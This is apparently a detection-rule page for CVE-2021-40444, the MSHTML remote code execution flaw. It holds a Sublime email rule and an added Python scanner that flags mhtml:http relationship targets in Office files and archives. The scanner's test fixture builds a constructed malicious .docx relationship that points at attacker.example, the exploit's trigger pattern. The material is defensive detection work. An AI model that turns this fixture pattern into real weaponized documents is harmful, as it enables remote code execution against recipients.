Attachment: CVE-2021-40444 - MSHTML Remote Code Execution Vulnerability
Attachment contains an external relationship whose target uses the mhtml: handler to load a remote OLE object (a target of the form mhtml:http://...), the pattern used in documents exploiting CVE-2021-40444.
On September 7, 2021, Microsoft released details about a zero-day RCE vulnerability in MSHTML that affects Microsoft Windows.
According to Microsoft: "we are aware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents. An attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine."
Sublime rule
name: "Attachment: CVE-2021-40444 - MSHTML Remote Code Execution Vulnerability"
description: |
  Attachment contains an external relationship that attempts to load a remote OLE object, consistent with use in CVE-2021-40444.

  On September 7, 2021, Microsoft released details about a zero-day RCE vulnerability in MSHTML that affects Microsoft Windows.

  According to Microsoft: "we are aware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents. An attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine."
references:
  - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444"
  - "https://twitter.com/buffaloverflow/status/1436261107329642522"
  - "https://twitter.com/jroosen/status/1435792491899494402"
  - "https://twitter.com/decalage2/status/1436433067619622916"
  - "https://www.reddit.com/r/crowdstrike/comments/pkb9wi/situational_awareness_cve202140444_mshtml_remote/"
  - "https://twitter.com/aaaddress1/status/1436393045939814400"
type: "rule"
severity: "critical"
source: |
  type.inbound
  and any(attachments,
          (
            (
              .file_extension in~ $file_extensions_macros
              or .file_extension =~ "rtf"
              or (
                .file_extension is null
                and .file_type == "unknown"
                and .content_type == "application/octet-stream"
                and .size < 100000000
              )
            )
            and any(file.oletools(.).relationships, regex.icontains(.target, ".*html:http.*"))
          )
          or (
            .file_extension in~ $file_extensions_common_archives
            and any(file.explode(.),
                    .flavors.mime == "text/xml"
                    and any(.scan.strings.strings, regex.icontains(., ".*oleObject.*mhtml.*http.*"))
            )
          )
  )
tags:
  - "CVE-2021-40444"
attack_types:
  - "Malware/Ransomware"
tactics_and_techniques:
  - "Exploit"
  - "Macros"
  - "Scripting"
detection_methods:
  - "Archive analysis"
  - "Content analysis"
  - "File analysis"
  - "Macro analysis"
  - "OLE analysis"
id: "8cefcf7f-2a48-5102-9b09-8db995759223"
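What the rule's two branches key on, as an added example that is not part of the Sublime rule or its repository: the first branch looks at the relationship targets of an Office document (via oletools) for an mhtml:http target; the second looks inside an archive for an XML part whose strings contain oleObject, mhtml and http. The script below reproduces that check offline with only the standard library: it parses every .rels part of an OOXML zip and flags relationships whose Target uses the mhtml: handler, and it recurses into nested zips to cover the archive case. The sample documents, the attacker.example host, and the helper names (find_external_ole_relationships, scan_attachment, build_docx, wrap_in_zip) are constructed for this example.

```python
"""Offline check for the CVE-2021-40444 document pattern: a package
relationship whose Target uses the mhtml: handler to reach a remote URL.
Added example, not part of the Sublime rule; stdlib only, constructed samples."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
            "relationships/oleObject")
# Same idea as the rule's regex.icontains(.target, ".*html:http.*"):
# an mhtml: scheme wrapping a remote http/https URL.
SUSPICIOUS_TARGET = re.compile(r"mhtml:https?://", re.IGNORECASE)
MAX_SIZE = 100_000_000  # mirrors the rule's .size < 100000000 guard


def find_external_ole_relationships(doc_bytes):
    """Return (rels_part, rel_id, target) for every relationship in an OOXML
    zip whose Target looks like mhtml:http...; non-zip input yields []."""
    hits = []
    if len(doc_bytes) >= MAX_SIZE or not zipfile.is_zipfile(io.BytesIO(doc_bytes)):
        return hits
    with zipfile.ZipFile(io.BytesIO(doc_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError:
                continue  # malformed part: skip rather than crash the scan
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                target = rel.get("Target", "")
                if SUSPICIOUS_TARGET.search(target):
                    hits.append((name, rel.get("Id"), target))
    return hits


def scan_attachment(data, depth=0, max_depth=2):
    """Scan a document or an archive containing documents (the rule's second
    branch), recursing into nested zips up to max_depth levels."""
    hits = list(find_external_ole_relationships(data))
    if depth >= max_depth or not zipfile.is_zipfile(io.BytesIO(data)):
        return hits
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.file_size >= MAX_SIZE:
                continue  # constructed guard against oversized members
            inner = zf.read(info.filename)
            if zipfile.is_zipfile(io.BytesIO(inner)):
                hits.extend(scan_attachment(inner, depth + 1, max_depth))
    return hits


def build_docx(rels_xml):
    """Build a minimal constructed .docx whose document.xml.rels is rels_xml."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml",
                    "<Types xmlns='http://schemas.openxmlformats.org/package/2006/content-types'/>")
        zf.writestr("word/document.xml",
                    "<w:document xmlns:w='http://schemas.openxmlformats.org/wordprocessingml/2006/main'/>")
        zf.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


def wrap_in_zip(member_name, member_bytes):
    """Put a constructed file inside an outer archive (the rule's archive case)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(member_name, member_bytes)
    return buf.getvalue()


# Constructed sample: external oleObject relationship using the mhtml: handler.
MALICIOUS_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId5" Type="{OLE_TYPE}"
    Target="mhtml:http://attacker.example/side.html" TargetMode="External"/>
</Relationships>"""

# Constructed sample: an embedded OLE object and an ordinary external hyperlink.
BENIGN_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId2" Type="{OLE_TYPE}" Target="embeddings/oleObject1.bin"/>
  <Relationship Id="rId3"
    Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"
    Target="https://example.com/" TargetMode="External"/>
</Relationships>"""

if __name__ == "__main__":
    for label, blob in (("malicious.docx", build_docx(MALICIOUS_RELS)),
                        ("benign.docx", build_docx(BENIGN_RELS)),
                        ("wrapped.zip", wrap_in_zip("inner.docx", build_docx(MALICIOUS_RELS)))):
        print(label, scan_attachment(blob))
```

Flagging on the target alone, as the rule does, is deliberate: the relationship Type and TargetMode are attacker-controlled strings, so a detection that insisted on Type="oleObject" and TargetMode="External" would be trivially evaded while the mhtml:http target, which is what MSHTML actually resolves, is harder to drop.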